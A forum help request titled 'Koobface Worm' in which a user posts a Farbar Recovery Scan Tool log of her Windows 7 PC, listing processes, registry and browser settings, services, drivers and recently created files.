Koobface Worm

sheri brennan

New Member
Thread author
Dec 13, 2017
1
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-12-2017
Ran by sheri (administrator) on SHERI-PC (13-12-2017 07:43:10)
Running from C:\Users\sheri\Desktop
Loaded Profiles: sheri (Available Profiles: sheri)
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(IObit) C:\Program Files\IObit\Advanced SystemCare\ASCService.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe
(IObit) C:\Program Files\IObit\Smart Defrag\SmartDefrag.exe
(IObit) C:\Program Files\IObit\Advanced SystemCare\Monitor.exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiSystem.exe
(Microsoft Corporation) C:\Windows\System32\printfilterpipelinesvc.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.7\GoogleCrashHandler.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(IObit) C:\Program Files\IObit\IObit Uninstaller\UninstallMonitor.exe
(IObit) C:\Program Files\IObit\Advanced SystemCare\ASCTray.exe
(IObit) C:\Program Files\IObit\Advanced SystemCare\ASC.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKU\S-1-5-21-3948143356-924845713-1080013463-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.2.25
Tcpip\..\Interfaces\{FB7B3318-7CD1-4E4D-887C-1D71C5647D83}: [DhcpNameServer] 192.168.0.1 205.171.2.25

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_iobitfs_17_37&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtBtCzyyB0CtA0EtD0Azy0FtDtC0FtN0D0Tzu0StBtDzzyDtN1L2XzutAtFtBzytFtCtDyEtFzytAtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StBtD0F0CyE0DyD0DtGyC0D0ByDtGyCtDzy0AtGyB0AtDtCtGyDyBtD0FyE0FyC0FtAyDyDtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyC0Dzy0FtAyCyCyDtGtC0Fzz0EtGyEyD0B0DtG0AtB0AtAtGtBtAtAzzyEzztBtAzy0DyE0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyEtBzyzy%26cr%3D113564250%26a%3Dwncy_iobitfs_17_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_iobitfs_17_37&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtBtCzyyB0CtA0EtD0Azy0FtDtC0FtN0D0Tzu0StBtDzzyDtN1L2XzutAtFtBzytFtCtDyEtFzytAtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StBtD0F0CyE0DyD0DtGyC0D0ByDtGyCtDzy0AtGyB0AtDtCtGyDyBtD0FyE0FyC0FtAyDyDtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyC0Dzy0FtAyCyCyDtGtC0Fzz0EtGyEyD0B0DtG0AtB0AtAtGtBtAtAzzyEzztBtAzy0DyE0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyEtBzyzy%26cr%3D113564250%26a%3Dwncy_iobitfs_17_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_iobitfs_17_37&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtBtCzyyB0CtA0EtD0Azy0FtDtC0FtN0D0Tzu0StBtDzzyDtN1L2XzutAtFtBzytFtCtDyEtFzytAtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StBtD0F0CyE0DyD0DtGyC0D0ByDtGyCtDzy0AtGyB0AtDtCtGyDyBtD0FyE0FyC0FtAyDyDtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyC0Dzy0FtAyCyCyDtGtC0Fzz0EtGyEyD0B0DtG0AtB0AtAtGtBtAtAzzyEzztBtAzy0DyE0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyEtBzyzy%26cr%3D113564250%26a%3Dwncy_iobitfs_17_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3948143356-924845713-1080013463-1000 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL =
SearchScopes: HKU\S-1-5-21-3948143356-924845713-1080013463-1000 -> {9928BBD0-3FDA-4CC5-BC53-EB3AD3D31954} URL = hxxps://search.yahoo.com/search?p={searchTerms}&intl=us&fr=yset_ie_syc_oracle&type=orcl_default&partnerexternal-oracle=external-oracle
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files\IObit\IObit Uninstaller\UninstallExplorer.dll [2016-05-23] (IObit)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_151\bin\ssv.dll [2017-11-26] (Oracle Corporation)
BHO: VIPRE Search Guard Helper -> {963C8283-AE7F-4AA6-9B3B-847A8FC62C5E} -> C:\Program Files\VIPRE\VSGN.dll => No File
BHO: IObit Surfing Protection -> {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} -> C:\Program Files\IObit\Advanced SystemCare\Surfing Protection\BrowerProtect\ASCPlugin_Protection.dll [2017-08-04] (IObit)
BHO: IObit Ads Removal -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\IObit\Advanced SystemCare\Surfing Protection\Adblock\Adblock.dll [2016-06-23] (IObit)
Toolbar: HKLM - VIPRE Search Guard Toolbar - {A924C17A-5E94-4E02-BED5-49720BA6F7FA} - No File
Toolbar: HKU\S-1-5-21-3948143356-924845713-1080013463-1000 -> No Name - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - No File
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL [2000-04-19] (Microsoft Corporation)
Handler: vipresg - {47BE2E5B-703B-444F-ABD3-05717D2191C6} - C:\Program Files\VIPRE\VSGN.dll No File
Handler: WSWSVCUchrome - No CLSID Value -
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF HKLM\...\Firefox\Extensions: [WSVCU@Wondershare.com] - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com_xpi
FF Extension: (Wondershare Video Converter Ultimate) - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com_xpi [2017-04-14] [Legacy]
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [2010-08-17] (Adobe Systems, Inc.)
FF Plugin: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [2017-11-26] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-11-26] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-12-12] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-12-12] (Google Inc.)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-09-20] (Adobe Systems)
FF Plugin HKU\S-1-5-21-3948143356-924845713-1080013463-1000: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\Users\sheri\AppData\Roaming\Visan\plugins\npRLSecurePluginLayer.dll [2011-11-15] (RocketLife, LLP)

Chrome:
=======
CHR HomePage: Default -> hxxp://yahoo.com/
CHR StartupUrls: Default -> "hxxp://yahoo.com/"
CHR NewTab: Default -> Active:"chrome-extension://jccfgghhbihbhomnlnadpjhkhmmboanj/newtab.html"
CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?ei={inputEncoding}&fr=crmas&p={searchTerms}
CHR DefaultSearchKeyword: Default -> yahoo.com
CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms}
CHR Profile: C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default [2017-12-13]
CHR Extension: (Google Drive) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-04]
CHR Extension: (Adblock Plus) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-09-26]
CHR Extension: (Google Docs Offline) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-10-19]
CHR Extension: (Yahoo Homepage) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\jccfgghhbihbhomnlnadpjhkhmmboanj [2017-07-20]
CHR Extension: (Ghostery) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\mlomiejdfkolichcflejclcbmpeaniij [2017-12-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Chrome Media Router) - C:\Users\sheri\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-11-16]
CHR HKU\S-1-5-21-3948143356-924845713-1080013463-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3948143356-924845713-1080013463-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [817760 2017-09-20] (Adobe Systems Incorporated)
R2 AdvancedSystemCareService11; C:\Program Files\IObit\Advanced SystemCare\ASCService.exe [1053984 2017-11-01] (IObit)
R2 AGSService; C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe [2257016 2017-08-23] (Adobe Systems, Incorporated)
S2 IObitUnSvr; C:\Program Files\IObit\IObit Uninstaller\IUService.exe [360736 2016-10-28] (IObit)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [103696 2016-11-14] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [280864 2016-11-14] (Microsoft Corporation)
R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [6959472 2017-09-10] (Reimage®)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-26] (Microsoft Corporation)
S3 WsAppService; C:\Program Files\Wondershare\WAF\2.1.6.0\WsAppService.exe [388608 2016-01-28] (Wondershare) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AmUStor; C:\Windows\System32\drivers\AmUStor.SYS [75416 2017-02-04] (Alcor Micro, Corp.)
R3 cpuz143; C:\Windows\temp\cpuz143\cpuz143_x32.sys [49472 2017-12-13] (CPUID)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [109456 2017-05-18] (Samsung Electronics Co., Ltd.)
R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO32.SYS [23840 2017-02-04] (REALiX(tm))
R3 iobit_monitor_server; C:\Program Files\IObit\Advanced SystemCare\drivers\Monitor_x86.sys [15216 2016-11-23] (IObit)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [252808 2016-08-25] (Microsoft Corporation)
R1 MpKsl6db6c477; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{EF1A88B5-630F-4A4C-8A08-67EBC5BF1FDB}\MpKsl6db6c477.sys [49504 2017-12-13] (Microsoft Corporation)
R0 SmartDefragDriver; C:\Windows\System32\Drivers\SmartDefragDriver.sys [18800 2016-03-22] (IObit)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [147344 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [23040 2017-08-30] (The OpenVPN Project) [File not signed]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-12-13 07:42 - 2017-12-13 07:42 - 001752576 _____ (Farbar) C:\Users\sheri\Desktop\FRST.exe
2017-12-13 07:39 - 2017-12-13 07:44 - 000013747 _____ C:\Users\sheri\Desktop\FRST.txt
2017-12-13 07:28 - 2017-12-13 07:35 - 000007259 _____ C:\Users\sheri\Downloads\FRST.txt
2017-12-13 07:27 - 2017-12-13 07:28 - 000000000 ____D C:\FRST
2017-12-13 07:19 - 2017-12-13 07:19 - 001336829 _____ C:\Users\sheri\Downloads\Autoruns (1).zip
2017-12-13 07:14 - 2017-12-13 07:14 - 001329536 _____ (Microsoft Corporation) C:\Users\sheri\Downloads\WindowsXP-KB905474-ENU-x86-Standalone (1).exe
2017-12-13 07:12 - 2017-12-13 07:12 - 001329536 _____ (Microsoft Corporation) C:\Users\sheri\Downloads\WindowsXP-KB905474-ENU-x86-Standalone.exe
2017-12-13 06:37 - 2017-12-13 06:37 - 000000000 ____D C:\_Backup
2017-12-13 06:24 - 2017-12-13 06:24 - 000001284 _____ C:\Windows\system32\ServiceConfig.xml
2017-12-13 06:02 - 2017-12-13 06:03 - 000000000 ____D C:\ProgramData\Reimage Protector
2017-12-13 06:02 - 2017-12-13 06:02 - 005154304 _____ C:\Users\sheri\Downloads\WindowsDefender.msi
2017-12-13 06:02 - 2017-12-13 06:02 - 000002062 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2017-12-13 06:02 - 2017-12-13 06:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
2017-12-13 06:01 - 2017-12-13 06:02 - 000000000 ____D C:\Program Files\Reimage
2017-12-13 06:00 - 2017-12-13 06:03 - 000000000 ____D C:\rei
2017-12-13 05:59 - 2017-12-13 06:03 - 000000140 _____ C:\Windows\Reimage.ini
2017-12-13 05:59 - 2017-12-13 05:59 - 000605424 _____ (Reimage) C:\Users\sheri\Downloads\ReimageRepair (1).exe
2017-12-13 05:58 - 2017-12-13 05:59 - 000605424 _____ (Reimage) C:\Users\sheri\Downloads\ReimageRepair.exe
2017-12-13 05:44 - 2017-12-13 05:44 - 000892944 _____ (Microsoft Corporation) C:\Users\sheri\Downloads\mssstool32.exe
2017-12-13 04:38 - 2017-12-13 05:23 - 000000000 ___HD C:\Users\Public\Documents\AdobeGC
2017-12-13 02:07 - 2017-11-14 16:36 - 000347336 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-12-13 02:07 - 2017-11-13 17:37 - 013679616 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-12-13 02:07 - 2017-11-13 17:15 - 000416256 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-12-13 02:07 - 2017-11-13 17:15 - 000279040 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-12-13 02:07 - 2017-11-13 17:15 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-12-13 02:07 - 2017-11-13 17:10 - 020269056 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-12-13 02:07 - 2017-11-13 16:32 - 000499200 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-12-13 02:07 - 2017-11-13 16:31 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-12-13 02:07 - 2017-11-07 12:56 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-12-13 02:07 - 2017-11-07 12:56 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-12-13 02:07 - 2017-11-07 12:46 - 000341504 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-12-13 02:07 - 2017-11-07 12:46 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-12-13 02:07 - 2017-11-07 12:46 - 000047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-12-13 02:07 - 2017-11-07 12:44 - 002293760 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-12-13 02:07 - 2017-11-07 12:41 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-12-13 02:07 - 2017-11-07 12:41 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-12-13 02:07 - 2017-11-07 12:40 - 000476160 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-12-13 02:07 - 2017-11-07 12:39 - 000662016 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-12-13 02:07 - 2017-11-07 12:39 - 000104960 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-12-13 02:07 - 2017-11-07 12:38 - 000620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-12-13 02:07 - 2017-11-07 12:38 - 000115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-12-13 02:07 - 2017-11-07 12:35 - 000667648 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-12-13 02:07 - 2017-11-07 12:29 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-12-13 02:07 - 2017-11-07 12:28 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-12-13 02:07 - 2017-11-07 12:28 - 000073216 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-12-13 02:07 - 2017-11-07 12:27 - 004509696 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-12-13 02:07 - 2017-11-07 12:26 - 000168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-12-13 02:07 - 2017-11-07 12:24 - 000130048 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-12-13 02:07 - 2017-11-07 12:19 - 000230400 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-12-13 02:07 - 2017-11-07 12:18 - 000694272 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-12-13 02:07 - 2017-11-07 12:18 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-12-13 02:07 - 2017-11-07 12:17 - 002058752 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-12-13 02:07 - 2017-11-07 12:17 - 001155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-12-13 02:07 - 2017-11-07 12:04 - 002767872 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-12-13 02:07 - 2017-11-07 12:01 - 001313280 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-12-13 02:07 - 2017-11-07 11:58 - 000710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-12-13 02:07 - 2017-11-07 08:13 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2017-12-13 02:07 - 2017-11-04 07:10 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\itircl.dll
2017-12-13 02:07 - 2017-11-04 07:10 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\itss.dll
2017-12-13 02:07 - 2017-11-02 07:11 - 000271360 _____ (Microsoft Corporation) C:\Windows\system32\iprtrmgr.dll
2017-12-13 02:07 - 2017-11-02 07:11 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\rtm.dll
2017-12-13 02:07 - 2017-11-02 07:11 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\mprdim.dll
2017-12-13 02:07 - 2017-11-02 06:56 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\iprtprio.dll
2017-12-12 17:21 - 2017-12-12 17:21 - 001997168 _____ C:\Users\sheri\Downloads\wrar550.exe
2017-12-12 17:16 - 2017-12-12 17:19 - 019204520 _____ (IObit ) C:\Users\sheri\Downloads\driver_booster_setup.exe
2017-12-12 08:29 - 2017-12-12 08:29 - 000000000 ____D C:\Users\sheri\AppData\Local\IsolatedStorage
2017-12-12 08:29 - 2017-12-12 08:29 - 000000000 _____ C:\Windows\system32\SBRC.dat
2017-12-12 08:25 - 2017-12-12 08:44 - 000001945 _____ C:\Windows\epplauncher.mif
2017-12-12 08:23 - 2017-12-12 08:43 - 000002093 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2017-12-12 08:23 - 2017-12-12 08:43 - 000000000 ____D C:\Program Files\Microsoft Security Client
2017-12-12 08:15 - 2017-12-12 08:15 - 000002864 _____ C:\Windows\system32\VipreEdgeProtectionOff.ini
2017-12-12 08:15 - 2017-05-12 10:02 - 000030840 _____ (ThreatTrack Security Inc.) C:\Windows\system32\Drivers\WebExaminer.sys
2017-12-12 08:14 - 2017-12-12 08:14 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_avchv_01009.Wdf
2017-12-12 08:13 - 2017-12-12 08:13 - 000000000 ____D C:\ProgramData\Downloaded Installations
2017-12-12 08:12 - 2017-12-13 06:25 - 000000000 ____D C:\Program Files\VIPRE
2017-12-12 08:12 - 2017-12-12 08:12 - 006072216 _____ (ThreatTrack Security, Inc) C:\Users\sheri\Downloads\vipre-advanced-security-trial.exe
2017-12-12 08:12 - 2017-12-12 08:12 - 000000000 ____D C:\Users\sheri\AppData\Local\VIPRE
2017-12-12 07:39 - 2017-12-12 07:39 - 001306150 _____ C:\Users\sheri\Downloads\Autoruns.zip
2017-12-12 07:00 - 2017-12-13 07:00 - 000000052 _____ C:\Users\sheri\AppData\Local\bpDLTbpDLT
2017-12-11 16:53 - 2017-12-11 16:53 - 000822328 _____ (Roblox Corporation) C:\Users\sheri\Downloads\RobloxPlayerLauncher.exe
2017-12-07 15:53 - 2017-12-07 15:53 - 000011138 _____ C:\Users\sheri\AppData\Local\recently-used.xbel
2017-12-07 15:38 - 2017-12-07 15:53 - 001444901 _____ C:\Users\sheri\Documents\1-800.xcf
2017-12-04 14:45 - 2017-12-04 14:45 - 000829030 _____ C:\Users\sheri\Downloads\candy-crushers.pdf
2017-12-04 14:44 - 2017-12-04 14:44 - 000377747 _____ C:\Users\sheri\Downloads\draw-clocks.pdf
2017-12-04 14:42 - 2017-12-04 14:42 - 000412364 _____ C:\Users\sheri\Downloads\read-the-time.pdf
2017-12-04 10:10 - 2017-12-07 15:53 - 000000000 ____D C:\Users\sheri\AppData\Local\gtk-2.0
2017-12-04 10:10 - 2017-12-04 10:10 - 000000000 ____D C:\Users\sheri\.thumbnails
2017-12-04 10:09 - 2017-12-04 12:27 - 000000000 ____D C:\Users\sheri\Desktop\New folder
2017-12-04 10:08 - 2017-12-07 15:53 - 000000000 ____D C:\Users\sheri\.gimp-2.8
2017-12-04 10:08 - 2017-12-04 10:08 - 000000000 ____D C:\Users\sheri\AppData\Local\gegl-0.2
2017-12-04 10:08 - 2017-12-04 10:08 - 000000000 ____D C:\Users\sheri\AppData\Local\fontconfig
2017-12-03 18:39 - 2017-12-03 20:28 - 3319478272 _____ C:\Users\sheri\Desktop\pcriver.com-Win_7_Ult_64Bit.iso
2017-12-01 20:23 - 2017-12-01 20:23 - 002402816 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-12-01 20:23 - 2017-12-01 20:23 - 000953344 _____ (Microsoft Corporation) C:\Windows\system32\gpedit.dll
2017-12-01 20:23 - 2017-12-01 20:23 - 000247808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2017-11-27 15:58 - 2017-11-27 15:58 - 000001922 _____ C:\Users\Public\Desktop\HP Print and Scan Doctor.lnk
2017-11-27 13:06 - 2017-12-07 15:15 - 000000000 ____D C:\Users\sheri\Desktop\Mistryee
2017-11-26 15:14 - 2015-07-16 11:12 - 006131200 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2017-11-26 15:14 - 2015-07-16 11:12 - 000856064 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2017-11-26 15:14 - 2015-07-16 11:12 - 000053248 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2017-11-26 15:14 - 2015-07-16 07:14 - 000355840 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2017-11-26 15:14 - 2014-12-11 09:47 - 000074240 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2017-11-26 08:41 - 2017-12-12 06:11 - 000002168 _____ C:\Users\Public\Desktop\Advanced SystemCare 11.lnk
2017-11-26 08:28 - 2013-10-01 15:45 - 000032256 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2017-11-26 08:27 - 2013-10-01 16:42 - 000049152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2017-11-26 08:27 - 2013-10-01 16:32 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2017-11-26 08:27 - 2013-10-01 16:30 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2017-11-26 08:27 - 2013-10-01 16:14 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2017-11-26 08:27 - 2013-10-01 16:14 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2017-11-26 08:27 - 2013-10-01 14:34 - 001068544 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2017-11-26 08:20 - 2017-11-26 08:20 - 000001204 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2017-11-26 08:20 - 2017-11-26 08:20 - 000000000 ____D C:\Users\sheri\AppData\Roaming\vstelemetry
2017-11-26 08:20 - 2017-11-26 08:20 - 000000000 ____D C:\Users\sheri\AppData\Roaming\Visual Studio Setup
